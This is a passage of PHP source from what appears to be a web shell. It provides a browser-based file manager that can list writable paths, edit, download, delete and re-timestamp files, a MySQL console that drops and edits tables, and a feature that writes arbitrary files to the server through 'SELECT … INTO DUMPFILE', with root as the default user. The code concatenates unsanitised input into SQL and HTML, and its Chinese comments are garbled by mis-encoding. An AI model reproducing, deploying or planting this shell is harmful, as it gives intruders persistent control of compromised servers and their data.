 585.     p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');
 586.     p(' | View Writable ( <a href="javascript:godir(\''.$nowpath.'\',\'dir\');">Directory</a>');
 587.     p(' | <a href="javascript:godir(\''.$nowpath.'\',\'file\');">File</a> )');
 588.     p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');
 589.  
 590.     p('<div style="padding:5px 0;"><form action="'.$self.'" method="POST">Find string in files(current folder): <input class="input" name="findstr" value="'.$findstr.'" type="text" /> <input class="bt" value="Find" type="submit" /> Type: <input class="input" name="writabledb" value="'.$writabledb.'" type="text" /><input name="dir" value="'.$dir.'" type="hidden" /> <input name="re" value="1" type="checkbox" '.($re ? 'checked' : '').' /> Regular expressions</form></div></td></tr>');
 591.  
 592.     p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
 593.  
 594.     //²é¿´ËùÓпÉдÎļþºÍĿ¼
 595.     $dirdata=array();
 596.     $filedata=array();
 597.  
 598.     if ($view_writable == 'dir') {
 599.         $dirdata = GetWDirList($nowpath);
 600.         $filedata = array();
 601.     } elseif ($view_writable == 'file') {
 602.         $dirdata = array();
 603.         $filedata = GetWFileList($nowpath);
 604.     } elseif ($findstr) {
 605.         $dirdata = array();
 606.         $filedata = GetSFileList($nowpath, $findstr, $re);
 607.     } else {
 608.         // Ŀ¼Áбí
 609.         //scandir()ЧÂʸü¸ß
 610.         $dirs=@opendir($dir);
 611.         while ($file=@readdir($dirs)) {
 612.             $filepath=$nowpath.$file;
 613.             if(@is_dir($filepath)){
 614.                 $dirdb['filename']=$file;
 615.                 $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
 616.                 $dirdb['dirchmod']=getChmod($filepath);
 617.                 $dirdb['dirperm']=getPerms($filepath);
 618.                 $dirdb['fileowner']=getUser($filepath);
 619.                 $dirdb['dirlink']=$nowpath;
 620.                 $dirdb['server_link']=$filepath;
 621.                 $dirdata[]=$dirdb;
 622.             } else {       
 623.                 $filedb['filename']=$file;
 624.                 $filedb['size']=sizecount(@filesize($filepath));
 625.                 $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
 626.                 $filedb['filechmod']=getChmod($filepath);
 627.                 $filedb['fileperm']=getPerms($filepath);
 628.                 $filedb['fileowner']=getUser($filepath);
 629.                 $filedb['dirlink']=$nowpath;
 630.                 $filedb['server_link']=$filepath;
 631.                 $filedata[]=$filedb;
 632.             }
 633.         }// while
 634.         unset($dirdb);
 635.         unset($filedb);
 636.         @closedir($dirs);
 637.     }
 638.     @sort($dirdata);
 639.     @sort($filedata);
 640.     $dir_i = '0';
 641.  
 642.     p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
 643.     makehide('action','file');
 644.     makehide('thefile');
 645.     makehide('doing');
 646.     makehide('dir',$nowpath);
 647.  
 648.     foreach($dirdata as $key => $dirdb){
 649.         if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
 650.             if($getdir && $getdir == $dirdb['server_link']) {
 651.                 $attachsize = dirsize($dirdb['server_link']);
 652.                 $attachsize = is_numeric($attachsize) ? sizecount($attachsize) : 'Unknown';
 653.             } else {
 654.                 $attachsize = '<a href="javascript:getsize(\''.$dirdb['server_link'].'\',\''.$dir.'\');">Stat</a>';
 655.             }
 656.             $thisbg = bg();
 657.             p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
 658.             p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="'.$dirdb['server_link'].'"></td>');
 659.             p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
 660.             p('<td nowrap><a href="javascript:opfile(\'newtime\',\''.$dirdb['server_link'].'\',\''.$dirdb['dirlink'].'\');">'.$dirdb['mtime'].'</a></td>');
 661.             p('<td nowrap>'.$attachsize.'</td>');
 662.             p('<td nowrap>');
 663.             p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
 664.             p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
 665.             p('<td nowrap><a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');
 666.             p('</tr>');
 667.             $dir_i++;
 668.         } else {
 669.             if($dirdb['filename']=='..') {
 670.                 p('<tr class='.bg().'>');
 671.                 p('<td align="center">-</td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');
 672.                 p('</tr>');
 673.             }
 674.         }
 675.     }
 676.  
 677.     p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>');
 678.     $file_i = '0';
 679.  
 680.     foreach($filedata as $key => $filedb){
 681.         if($filedb['filename']!='..' && $filedb['filename']!='.') {
 682.             $fileurl = str_replace($_SERVER["DOCUMENT_ROOT"],'',$filedb['server_link']);
 683.             $thisbg = bg();
 684.             p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
 685.             p('<td width="2%" nowrap><input name="dl[]" type="checkbox" value="'.$filedb['server_link'].'"></td>');
 686.             p('<td>'.((strpos($filedb['server_link'], $_SERVER["DOCUMENT_ROOT"]) !== false) ? '<a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a>' : $filedb['filename']).'</td>');
 687.             p('<td nowrap><a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">'.$filedb['mtime'].'</a></td>');
 688.             p('<td nowrap>'.$filedb['size'].'</td>');
 689.             p('<td nowrap>');
 690.             p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
 691.             p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
 692.             p('<td nowrap>');
 693.             p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> | ');
 694.             p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');
 695.             p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | ');
 696.             p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a>');
 697.             p('</td></tr>');
 698.             $file_i++;
 699.         }
 700.     }
 701.     p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
 702.     p('<tr class="'.bg().'"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td colspan="4"><a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
 703.     p('</form></table>');
 704. }// end dir
 705.  
 706. elseif ($action == 'sqlfile') {
 707.     if($doing=="mysqlupload"){
 708.         $file = $_FILES['uploadfile'];
 709.         $filename = $file['tmp_name'];
 710.         if (file_exists($savepath)) {
 711.             m('The goal file has already existed');
 712.         } else {
 713.             if(!$filename) {
 714.                 m('Please choose a file');
 715.             } else {
 716.                 $fp=@fopen($filename,'r');
 717.                 $contents=@fread($fp, filesize($filename));
 718.                 @fclose($fp);
 719.                 $contents = bin2hex($contents);
 720.                 if(!$upname) $upname = $file['name'];
 721.                 $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
 722.                 $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
 723.                 m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
 724.             }
 725.         }
 726.     }
 727. ?>
 728. <script type="text/javascript">
 729. function mysqlfile(doing){
 730.     if(!doing) return;
 731.     $('doing').value=doing;
 732.     $('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
 733.     $('mysqlfile').dbport.value=$('dbinfo').dbport.value;
 734.     $('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
 735.     $('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
 736.     $('mysqlfile').dbname.value=$('dbinfo').dbname.value;
 737.     $('mysqlfile').charset.value=$('dbinfo').charset.value;
 738.     $('mysqlfile').submit();
 739. }
 740. </script>
 741. <?php
 742.     !$dbhost && $dbhost = 'localhost';
 743.     !$dbuser && $dbuser = 'root';
 744.     !$dbport && $dbport = '3306';
 745.     formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));
 746.     makehide('action','sqlfile');
 747.     p('<p>');
 748.     p('DBHost:');
 749.     makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
 750.     p(':');
 751.     makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
 752.     p('DBUser:');
 753.     makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
 754.     p('DBPass:');
 755.     makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
 756.     p('DBName:');
 757.     makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
 758.     p('DBCharset:');
 759.     makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1));
 760.     p('</p>');
 761.     formfoot();
 762.     p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
 763.     p('<h2>Upload file</h2>');
 764.     p('<p><b>This operation the DB user must has FILE privilege</b></p>');
 765.     p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
 766.     p('<h2>Download file</h2>');
 767.     p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
 768.     makehide('dbhost');
 769.     makehide('dbport');
 770.     makehide('dbuser');
 771.     makehide('dbpass');
 772.     makehide('dbname');
 773.     makehide('charset');
 774.     makehide('doing');
 775.     makehide('action','sqlfile');
 776.     p('</form>');
 777. }
 778.  
 779. elseif ($action == 'mysqladmin') {
 780.     !$dbhost && $dbhost = 'localhost';
 781.     !$dbuser && $dbuser = 'root';
 782.     !$dbport && $dbport = '3306';
 783.     $dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
 784.     if(isset($dbhost)){
 785.         $dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
 786.     }
 787.     if(isset($dbuser)) {
 788.         $dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
 789.     }
 790.     if(isset($dbpass)) {
 791.         $dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
 792.     }
 793.     if(isset($dbport)) {
 794.         $dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
 795.     }
 796.     if(isset($dbname)) {
 797.         $dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
 798.     }
 799.     if(isset($charset)) {
 800.         $dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
 801.     }
 802.  
 803.     if ($doing == 'backupmysql' && $saveasfile) {
 804.         if (!$table) {
 805.             m('Please choose the table');
 806.         } else {
 807.             $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
 808.             $fp = @fopen($path,'w');
 809.             if ($fp) {
 810.                 foreach($table as $k => $v) {
 811.                     if ($v) {
 812.                         sqldumptable($v, $fp);
 813.                     }
 814.                 }
 815.                 fclose($fp);               
 816.                 $fileurl = str_replace(SA_ROOT,'',$path);
 817.                 m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
 818.                 mysql_close();
 819.             } else {
 820.                 m('Backup failed');
 821.             }
 822.         }
 823.     }
 824.     if ($insert && $insertsql) {
 825.         $keystr = $valstr = $tmp = '';
 826.         foreach($insertsql as $key => $val) {
 827.             if ($val) {
 828.                 $keystr .= $tmp.$key;
 829.                 $valstr .= $tmp."'".addslashes($val)."'";
 830.                 $tmp = ',';
 831.             }
 832.         }
 833.         if ($keystr && $valstr) {
 834.             $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
 835.             m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
 836.         }
 837.     }
 838.     if ($update && $insertsql && $base64) {
 839.         $valstr = $tmp = '';
 840.         foreach($insertsql as $key => $val) {
 841.             $valstr .= $tmp.$key."='".addslashes($val)."'";
 842.             $tmp = ',';
 843.         }
 844.         if ($valstr) {
 845.             $where = base64_decode($base64);
 846.             $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
 847.             m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
 848.         }
 849.     }
 850.     if ($doing == 'del' && $base64) {
 851.         $where = base64_decode($base64);
 852.         $delete_sql = "DELETE FROM $tablename WHERE $where";
 853.         $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
 854.         m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
 855.     }
 856.  
 857.     if ($tablename && $doing == 'drop') {
 858.         $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
 859.         if (q("DROP TABLE $tablename")) {
 860.             m('Drop table of success');
 861.             $tablename = '';
 862.         } else {
 863.             m(mysql_error());
 864.         }
 865.     }
 866.  
 867.     formhead(array('title'=>'MYSQL Manager'));
 868.     makehide('action','mysqladmin');
 869.     p('<p>');
 870.     p('DBHost:');
 871.     makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
 872.     p(':');
 873.     makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
 874.     p('DBUser:');
 875.     makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
 876.     p('DBPass:');
 877.     makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
 878.     p('DBCharset:');
 879.     makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1));
 880.     makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
 881.     p('</p>');
 882.     formfoot();
 883.  
 884.     //²Ù×÷¼Ç¼
 885.     formhead(array('name'=>'recordlist'));
 886.     makehide('doing');
 887.     makehide('action','mysqladmin');
 888.     makehide('base64');
 889.     makehide('tablename');
 890.     p($dbform);
 891.     formfoot();
 892.  
 893.     //Ñ¡¶¨Êý¾Ý¿â
 894.     formhead(array('name'=>'setdbname'));
 895.     makehide('action','mysqladmin');
 896.     p($dbform);
 897.     if (!$dbname) {
 898.         makehide('dbname');
 899.     }
 900.     formfoot();
 901.  
 902.     //Ñ¡¶¨±í
 903.     formhead(array('name'=>'settable'));
 904.     makehide('action','mysqladmin');
 905.     p($dbform);
 906.     makehide('tablename');
 907.     makehide('page',$page);
 908.     makehide('doing');
 909.     formfoot();
 910.  
 911.     $cachetables = array();
 912.     $pagenum = 30;
 913.     $page = intval($page);
 914.     if($page) {
 915.         $start_limit = ($page - 1) * $pagenum;
 916.     } else {
 917.         $start_limit = 0;
 918.         $page = 1;
 919.     }
 920.     if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
 921.         $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
 922.         //»ñÈ¡Êý¾Ý¿âÐÅÏ¢
 923.         $mysqlver = mysql_get_server_info();
 924.         p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
 925.         $highver = $mysqlver > '4.1' ? 1 : 0;
 926.  
 927.         //»ñÈ¡Êý¾Ý¿â
 928.         $query = q("SHOW DATABASES");
 929.         $dbs = array();
 930.         $dbs[] = '-- Select a database --';
 931.         while($db = mysql_fetch_array($query)) {
 932.             $dbs[$db['Database']] = $db['Database'];
 933.         }
 934.         makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
 935.         $tabledb = array();
 936.         if ($dbname) {
 937.             p('<p>');
 938.             p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
 939.             if ($tablename) {
 940.                 p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
 941.             }
 942.             p('</p>');
 943.             mysql_select_db($dbname);
 944.  
 945.             $getnumsql = '';
 946.             $runquery = 0;
 947.             if ($sql_query) {
 948.                 $runquery = 1;
 949.             }
 950.             $allowedit = 0;
 951.             if ($tablename && !$sql_query) {
 952.                 $sql_query = "SELECT * FROM $tablename";
 953.                 $getnumsql = $sql_query;
 954.                 $sql_query = $sql_query." LIMIT $start_limit, $pagenum";
 955.                 $allowedit = 1;
 956.             }
 957.             p('<form action="'.$self.'" method="POST">');
 958.             p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
 959.             makehide('tablename', $tablename);
 960.             makehide('action','mysqladmin');
 961.             p($dbform);
 962.             p('</form>');
 963.             if ($tablename || ($runquery && $sql_query)) {
 964.                 if ($doing == 'structure') {
 965.                     $result = q("SHOW FULL COLUMNS FROM $tablename");
 966.                     $rowdb = array();
 967.                     while($row = mysql_fetch_array($result)) {
 968.                         $rowdb[] = $row;
 969.                     }
 970.                     p('<h3>Structure</h3>');
 971.                     p('<table border="0" cellpadding="3" cellspacing="0">');
 972.                     p('<tr class="head">');
 973.                     p('<td>Field</td>');
 974.                     p('<td>Type</td>');
 975.                     p('<td>Collation</td>');
 976.                     p('<td>Null</td>');
 977.                     p('<td>Key</td>');
 978.                     p('<td>Default</td>');
 979.                     p('<td>Extra</td>');
 980.                     p('<td>Privileges</td>');
 981.                     p('<td>Comment</td>');
 982.                     p('</tr>');
 983.                     foreach ($rowdb as $row) {
 984.                         $thisbg = bg();
 985.                         p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
 986.                         p('<td>'.$row['Field'].'</td>');
 987.                         p('<td>'.$row['Type'].'</td>');
 988.                         p('<td>'.$row['Collation'].'&nbsp;</td>');
 989.                         p('<td>'.$row['Null'].'&nbsp;</td>');
 990.                         p('<td>'.$row['Key'].'&nbsp;</td>');
 991.                         p('<td>'.$row['Default'].'&nbsp;</td>');
 992.                         p('<td>'.$row['Extra'].'&nbsp;</td>');
 993.                         p('<td>'.$row['Privileges'].'&nbsp;</td>');
 994.                         p('<td>'.$row['Comment'].'&nbsp;</td>');
 995.                         p('</tr>');
 996.                     }
 997.                     tbfoot();
 998.                     $result = q("SHOW INDEX FROM $tablename");
 999.                     $rowdb = array();
 1000.                     while($row = mysql_fetch_array($result)) {
 1001.                         $rowdb[] = $row;
 1002.                     }
 1003.                     p('<h3>Indexes</h3>');
 1004.                     p('<table border="0" cellpadding="3" cellspacing="0">');
 1005.                     p('<tr class="head">');
 1006.                     p('<td>Keyname</td>');
 1007.                     p('<td>Type</td>');
 1008.                     p('<td>Unique</td>');
 1009.                     p('<td>Packed</td>');
 1010.                     p('<td>Seq_in_index</td>');
 1011.                     p('<td>Field</td>');
 1012.                     p('<td>Cardinality</td>');
 1013.                     p('<td>Collation</td>');
 1014.                     p('<td>Null</td>');
 1015.                     p('<td>Comment</td>');
 1016.                     p('</tr>');
 1017.                     foreach ($rowdb as $row) {
 1018.                         $thisbg = bg();
 1019.                         p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
 1020.                         p('<td>'.$row['Key_name'].'</td>');
 1021.                         p('<td>'.$row['Index_type'].'</td>');
 1022.                         p('<td>'.($row['Non_unique'] ? 'No' : 'Yes').'&nbsp;</td>');
 1023.                         p('<td>'.($row['Packed'] === null ? 'No' : $row['Packed']).'&nbsp;</td>');
 1024.                         p('<td>'.$row['Seq_in_index'].'</td>');
 1025.                         p('<td>'.$row['Column_name'].($row['Sub_part'] ? '('.$row['Sub_part'].')' : '').'&nbsp;</td>');
 1026.                         p('<td>'.($row['Cardinality'] ? $row['Cardinality'] : 0).'&nbsp;</td>');
 1027.                         p('<td>'.$row['Collation'].'&nbsp;</td>');
 1028.                         p('<td>'.$row['Null'].'&nbsp;</td>');
 1029.                         p('<td>'.$row['Comment'].'&nbsp;</td>');
 1030.                         p('</tr>');
 1031.                     }
 1032.                     tbfoot();
 1033.                 } elseif ($doing == 'insert' || $doing == 'edit') {
 1034.                     $result = q('SHOW COLUMNS FROM '.$tablename);
 1035.                     while ($row = mysql_fetch_array($result)) {
 1036.                         $rowdb[] = $row;
 1037.                     }
 1038.                     $rs = array();
 1039.                     if ($doing == 'insert') {
 1040.                         p('<h2>Insert new line in '.$tablename.' table &raquo;</h2>');
 1041.                     } else {
 1042.                         p('<h2>Update record in '.$tablename.' table &raquo;</h2>');
 1043.                         $where = base64_decode($base64);
 1044.                         $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
 1045.                         $rs = mysql_fetch_array($result);
 1046.                     }
 1047.                     p('<form method="post" action="'.$self.'">');
 1048.                     p($dbform);
 1049.                     makehide('action','mysqladmin');
 1050.                     makehide('tablename',$tablename);
 1051.                     p('<table border="0" cellpadding="3" cellspacing="0">');
 1052.                     foreach ($rowdb as $row) {
 1053.                         if ($rs[$row['Field']]) {
 1054.                             $value = htmlspecialchars($rs[$row['Field']]);
 1055.                         } else {
 1056.                             $value = '';
 1057.                         }
 1058.                         $thisbg = bg();
 1059.                         p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
 1060.                         if ($row['Key'] == 'UNI' || $row['Extra'] == 'auto_increment' || $row['Key'] == 'PRI') {
 1061.                             p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td>'.$value.'&nbsp;</td></tr>');
 1062.                         } else {                           
 1063.                             p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
 1064.                         }
 1065.                     }
 1066.                     if ($doing == 'insert') {
 1067.                         p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
 1068.                     } else {
 1069.                         p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
 1070.                         makehide('base64', $base64);
 1071.                     }
 1072.                     p('</table></form>');
 1073.                 } else {
 1074.                     $querys = @explode(';',$sql_query);
 1075.                     foreach($querys as $num=>$query) {
 1076.                         if ($query) {
 1077.                             p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
 1078.                             switch(qy($query))
 1079.                             {
 1080.                                 case 0:
 1081.                                     p('<h2>Error : '.mysql_error().'</h2>');
 1082.                                     break; 
 1083.                                 case 1:
 1084.                                     if (strtolower(substr($query,0,13)) == 'select * from') {
 1085.                                         $allowedit = 1;
 1086.                                     }
 1087.                                     if ($getnumsql) {
 1088.                                         $tatol = mysql_num_rows(q($getnumsql));
 1089.                                         $multipage = multi($tatol, $pagenum, $page, $tablename);
 1090.                                     }
 1091.                                     if (!$tablename) {
 1092.                                         $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
 1093.                                         $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
 1094.                                         preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
 1095.                                         $tablename = $matches[1][0];
 1096.                                     }
 1097.  
 1098.                                     /*********************/
 1099.                                     $getfield = q("SHOW COLUMNS FROM $tablename");
 1100.                                     $rowdb = array();
 1101.                                     $keyfied = ''; //Ö÷¼ü×Ö¶Î
 1102.                                     while($row = @mysql_fetch_assoc($getfield)) {
 1103.                                         $rowdb[$row['Field']]['Key'] = $row['Key'];
 1104.                                         $rowdb[$row['Field']]['Extra'] = $row['Extra'];
 1105.                                         if ($row['Key'] == 'UNI' || $row['Key'] == 'PRI') {
 1106.                                             $keyfied = $row['Field'];
 1107.                                         }
 1108.                                     }
 1109.                                     /*********************/                            
 1110.                                     //Ö±½Óä¯ÀÀ±í°´ÕÕÖ÷¼ü½µÐòÅÅÁÐ
 1111.                                     if ($keyfied && strtolower(substr($query,0,13)) == 'select * from') {
 1112.                                         $query = str_replace(" LIMIT ", " order by $keyfied DESC LIMIT ", $query);
 1113.                                     }
 1114.  
 1115.                                     $result = q($query);
 1116.  
 1117.                                     p($multipage);
 1118.                                     p('<table border="0" cellpadding="3" cellspacing="0">');
 1119.                                     p('<tr class="head">');
 1120.                                     if ($allowedit) p('<td>Action</td>');
 1121.                                     $fieldnum = @mysql_num_fields($result);
 1122.                                     for($i=0;$i<$fieldnum;$i++){
 1123.                                         $name = @mysql_field_name($result, $i);
 1124.                                         $type = @mysql_field_type($result, $i);
 1125.                                         $len = @mysql_field_len($result, $i);
 1126.                                         p("<td nowrap>$name<br><span>$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? '<b> - PRIMARY</b>' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? '<b> - Auto</b>' : '')."</span></td>");
 1127.                                     }
 1128.                                     p('</tr>');
 1129.                                    
 1130.                                     while($mn = @mysql_fetch_assoc($result)){
 1131.                                         $thisbg = bg();
 1132.                                         p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
 1133.                                         $where = $tmp = $b1 = '';
 1134.                                         //Ñ¡È¡Ìõ¼þ×Ö¶ÎÓÃ
 1135.                                         foreach($mn as $key=>$inside){
 1136.                                             if ($inside) {
 1137.                                                 //²éÕÒÖ÷¼ü¡¢Î¨Ò»ÊôÐÔ¡¢×Ô¶¯Ôö¼ÓµÄ×ֶΣ¬ÕÒµ½¾ÍÍ£Ö¹£¬·ñÔò×éºÏËùÓÐ×Ö¶Î×÷ΪÌõ¼þ¡£
 1138.                                                 if ($rowdb[$key]['Key'] == 'UNI' || $rowdb[$key]['Extra'] == 'auto_increment' || $rowdb[$key]['Key'] == 'PRI') {
 1139.                                                     $where = $key."='".addslashes($inside)."'";
 1140.                                                     break;
 1141.                                                 }
 1142.                                                 $where .= $tmp.$key."='".addslashes($inside)."'";
 1143.                                                 $tmp = ' AND ';
 1144.                                             }
 1145.                                         }
 1146.                                         //¶ÁÈ¡¼Ç¼ÓÃ
 1147.                                         foreach($mn as $key=>$inside){
 1148.                                             $b1 .= '<td nowrap>'.html_clean($inside).'&nbsp;</td>';
 1149.                                         }
 1150.                                         $where = base64_encode($where);
 1151.  
 1152.                                         if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');
 1153.  
 1154.                                         p($b1);
 1155.                                         p('</tr>');
 1156.                                         unset($b1);
 1157.                                     }
 1158.                                     p('<tr class="head">');
 1159.                                     if ($allowedit) p('<td>Action</td>');
 1160.                                     $fieldnum = @mysql_num_fields($result);
 1161.                                     for($i=0;$i<$fieldnum;$i++){
 1162.                                         $name = @mysql_field_name($result, $i);
 1163.                                         $type = @mysql_field_type($result, $i);
 1164.                                         $len = @mysql_field_len($result, $i);
 1165.                                         p("<td nowrap>$name<br><span>$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? '<b> - PRIMARY</b>' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? '<b> - Auto</b>' : '')."</span></td>");
 1166.                                     }
 1167.                                     p('</tr>');
 1168.                                     tbfoot();
 1169.                                     p($multipage);
 1170.                                     break;
 1171.                                 case 2:
 1172.                                     $ar = mysql_affected_rows();
 1173.                                     p('<h2>affected rows : <b>'.$ar.'</b></h2>');
 1174.                                     break;
 1175.                             }
 1176.                         }
 1177.                     }
 1178.                 }
 1179.             } else {
 1180.                 $query = q("SHOW TABLE STATUS");
 1181.                 $table_num = $table_rows = $data_size = 0;
 1182.                 $tabledb = array();
 1183.                 while($table = mysql_fetch_array($query)) {
 1184.                     $data_size = $data_size + $table['Data_length'];
 1185.                     $table_rows = $table_rows + $table['Rows'];
 1186.                     $table['Data_length'] = sizecount($table['Data_length']);
 1187.                     $table_num++;
 1188.                     $tabledb[] = $table;
 1189.                 }
 1190.                 $data_size = sizecount($data_size);
 1191.                 unset($table);
 1192.                 p('<table border="0" cellpadding="0" cellspacing="0">');
